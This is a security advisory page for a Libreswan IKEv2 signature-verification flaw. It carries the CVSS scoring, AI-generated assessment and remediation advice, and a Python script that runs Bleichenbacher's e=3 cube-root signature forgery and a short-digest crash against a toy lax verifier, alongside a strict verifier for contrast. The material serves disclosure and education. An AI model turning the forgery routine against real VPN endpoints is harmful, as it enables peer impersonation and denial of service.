Severity by source
Primary rating from vendor (libreswan): CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H (8.1, High)
Network-reachable and unauthenticated (AV:N, PR:N); the forgery requires the non-default small-public-exponent key condition, giving AC:H; peer impersonation yields C:H/I:H, and the daemon-abort denial of service gives A:H.
Description (source: CVE.org)
Libreswan, via the function RSA_authenticate_hash_signature_pkcs1_1_5_rsa(), did not correctly verify the DER encoding of the ASN.1 digest when the IKEv2 AUTH payload was encoded using RSASSA-PKCS1-v1_5 (RFC 8017). A remote attacker can use a variation on the Bleichenbacher attack to forge the AUTH payload when small public exponents are used (e.g., e=3), leading to impersonation. Additionally, a remote attacker, by encoding a shorter than expected hash in the AUTH payload, could trigger an assertion leading to denial-of-service. The daemon aborts and restarts; continued exploitation causes sustained denial of service. Remote code execution is not possible. X.509 certificate verifications of the remote IKE peer are not affected.
Analysis (AI-generated)
Peer impersonation and denial-of-service in Libreswan IPsec/IKEv2 arises from improper DER/ASN.1 digest verification in RSA_authenticate_hash_signature_pkcs1_1_5_rsa() when the IKEv2 AUTH payload uses RSASSA-PKCS1-v1_5 signatures. A remote unauthenticated attacker can mount a Bleichenbacher-style forgery to impersonate a peer when small RSA public exponents (e.g., e=3) are in use, or send an undersized hash to trip an assertion that aborts and restarts the daemon for sustained DoS. …
Vulnerability Assessment (AI-generated)
| Aspect | Assessment |
| --- | --- |
| Exploitation | For the impersonation/forgery path, the required condition is that the authenticating peer uses IKEv2 AUTH with RSASSA-PKCS1-v1_5 raw RSA signatures and an RSA key with a small public exponent such as e=3; this non-default key configuration is the exact prerequisite and the primary limiting factor (modern keys typically use e=65537, against which the low-exponent forgery does not work). … |
| Risk Assessment | The NVD CVSS 3.1 score is 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H): network-reachable and unauthenticated (PR:N), with high attack complexity (AC:H) reflecting the small-exponent key requirement and the cryptographic work needed to construct the forgery. … |
| Exploit Scenario | An attacker who can reach the victim's IKEv2 endpoint initiates an IKE_AUTH exchange and submits a forged RSASSA-PKCS1-v1_5 AUTH payload. If the peer key uses a small exponent such as e=3, the forgery needs only the public key: the attacker builds an encoded block whose leading bytes satisfy the lax DER parser and whose trailing bytes are arbitrary, takes an integer cube root of it, and the parser accepts the result, letting the attacker impersonate a trusted peer and establish a VPN tunnel. Alternatively, the attacker repeatedly sends AUTH payloads containing a shorter-than-expected hash, tripping an assertion that aborts the daemon on each attempt for a sustained denial of service. … |
| Remediation | Apply the vendor-released Libreswan patch published at https://libreswan.org/security/CVE-2026-50722/ and detailed in the advisory https://libreswan.org/security/CVE-2026-50722/CVE-2026-50722.txt; upgrade to the fixed release once the exact version is confirmed from that advisory, since this page does not name a specific fix version. Until patched, check whether any configured peer RSA key uses a small public exponent: keys with e=65537 remove the forgery path, but this page does not establish that they remove the denial-of-service path. … |
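The forgery and crash paths described in the assessment above, as an added illustration that is not Libreswan's code and not part of this page: a generic lax PKCS#1 v1.5 parser of the class the description names, the strict RFC 8017 comparison that defeats it, and Bleichenbacher's 2006 cube-root forgery run against a constructed e=3 key generated in-process (the message, key and DigestInfo layout are all assumptions of this example). In this illustration the short-digest block is also delivered through the e=3 construction; the page does not say how that condition is reached against Libreswan itself, so that part shows the shape of the failure mode rather than a reproduction.

```python
"""Bleichenbacher-style e=3 forgery and short-digest crash against a lax
PKCS#1 v1.5 verifier. Added illustration for the CVE text above, not
Libreswan's code; all key material is generated in-process (constructed)."""
import hashlib
import hmac
import secrets

K = 256  # modulus length in bytes (2048-bit key)
# DER AlgorithmIdentifier for SHA-256 inside DigestInfo (RFC 8017, 9.2 note 1)
SHA256_ALGID = bytes.fromhex("300d06096086480165030402010500")

def digest_info(h):
    """DER DigestInfo ::= SEQUENCE { AlgorithmIdentifier, OCTET STRING }."""
    body = SHA256_ALGID + b"\x04" + bytes([len(h)]) + h
    return b"\x30" + bytes([len(body)]) + body

def is_probable_prime(n, rounds=16):
    """Miller-Rabin, adequate for a demo key (not hardened key generation)."""
    if n < 4 or n % 2 == 0:
        return n in (2, 3)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_e3_key(bits=2048):
    """Toy RSA key with the weak public exponent e = 3 (p, q = 2 mod 3)."""
    def prime():
        while True:
            p = secrets.randbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
            if p % 3 == 2 and is_probable_prime(p):
                return p
    p, q = prime(), prime()
    return p * q, 3, pow(3, -1, (p - 1) * (q - 1))

def sign(n, d, msg):
    """RSASSA-PKCS1-v1_5 signing: EM = 00 01 FF..FF 00 || DigestInfo."""
    t = digest_info(hashlib.sha256(msg).digest())
    em = b"\x00\x01" + b"\xff" * (K - len(t) - 3) + b"\x00" + t
    return pow(int.from_bytes(em, "big"), d, n).to_bytes(K, "big")

def lax_verify(n, e, msg, sig):
    """Walks the block and trusts the DER lengths it reads; never checks that
    padding fills the block or that nothing trails the digest. Illustrates
    the bug class in the description, not Libreswan's actual routine."""
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(K, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < K and em[i] == 0xFF:
        i += 1
    if i < 10 or i > K - 2 or em[i] != 0x00 or em[i + 1] != 0x30:
        return False                    # needs >= 8 FF bytes, 00, SEQUENCE
    i += 3                              # SEQUENCE length byte not checked
    if em[i:i + len(SHA256_ALGID)] != SHA256_ALGID:
        return False
    i += len(SHA256_ALGID)
    if i + 2 > K or em[i] != 0x04:      # OCTET STRING tag + length
        return False
    hlen = em[i + 1]
    # Attacker-chosen length treated as an internal invariant: the assertion
    # aborts the whole process instead of failing the authentication.
    assert hlen == 32, "digest shorter than expected"
    return em[i + 2:i + 2 + hlen] == hashlib.sha256(msg).digest()

def strict_verify(n, e, msg, sig):
    """RFC 8017 section 8.2.2: rebuild the full EM and compare all K bytes."""
    s = int.from_bytes(sig, "big")
    if len(sig) != K or s >= n:
        return False
    em = pow(s, e, n).to_bytes(K, "big")
    t = digest_info(hashlib.sha256(msg).digest())
    expected = b"\x00\x01" + b"\xff" * (K - len(t) - 3) + b"\x00" + t
    return hmac.compare_digest(em, expected)

def iroot3_ceil(x):
    """Ceiling of the integer cube root (Newton to the floor, then adjust)."""
    r = 1 << ((x.bit_length() + 2) // 3)
    while True:
        nr = (2 * r + x // (r * r)) // 3
        if nr >= r:
            break
        r = nr
    return r if r ** 3 >= x else r + 1

def forge(n, e, msg, digest=None, ff_bytes=8):
    """Bleichenbacher 2006: the structure the lax parser wants goes at the top
    of the block, the rest is free garbage, and an integer cube root (no
    private key) gives a 'signature' whose cube starts with that head."""
    assert e == 3, "forgery needs the small public exponent"
    h = hashlib.sha256(msg).digest() if digest is None else digest
    head = b"\x00\x01" + b"\xff" * ff_bytes + b"\x00" + digest_info(h)
    garbage_bits = 8 * (K - len(head))
    s = iroot3_ceil(int.from_bytes(head, "big") << garbage_bits)
    # s^3 overshoots the target by < 3s^2+3s+1 < 2**garbage_bits, so the high
    # bytes of s^3 are exactly `head`; s^3 < n, so no modular reduction occurs.
    return s.to_bytes(K, "big")

def demo(msg=b"IKE_AUTH signed octets (constructed sample)"):
    """Which verifier accepts what, for a genuine and a forged AUTH payload."""
    n, e, d = gen_e3_key()
    genuine, forged = sign(n, d, msg), forge(n, e, msg)
    crash = forge(n, e, msg, digest=b"\x00" * 16)  # OCTET STRING length 0x10
    try:
        lax_verify(n, e, msg, crash)
        lax_aborts = False
    except AssertionError:
        lax_aborts = True
    return {"strict_genuine": strict_verify(n, e, msg, genuine),
            "lax_genuine": lax_verify(n, e, msg, genuine),
            "strict_forged": strict_verify(n, e, msg, forged),
            "lax_forged": lax_verify(n, e, msg, forged),
            "strict_short_digest": strict_verify(n, e, msg, crash),
            "lax_short_digest_aborts": lax_aborts}

if __name__ == "__main__":
    print(demo())
```

`demo()` shows the lax parser accepting the forged block and aborting on the short-digest block while the strict verifier rejects both and accepts the genuine signature. The same `forge()` cannot be run against e=65537, which is the AC:H condition in the vector: the cube-root trick relies on s^e staying below the modulus.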
Recommended Action (AI-generated)
Within 24 hours: Identify all Libreswan deployments in your infrastructure; document current versions; retrieve the vendor advisory for CVE-2026-50722 to identify the patched version and release date. …
Related identifiers
EUVD-2026-41440
GHSA-h4cv-5vw8-2p6m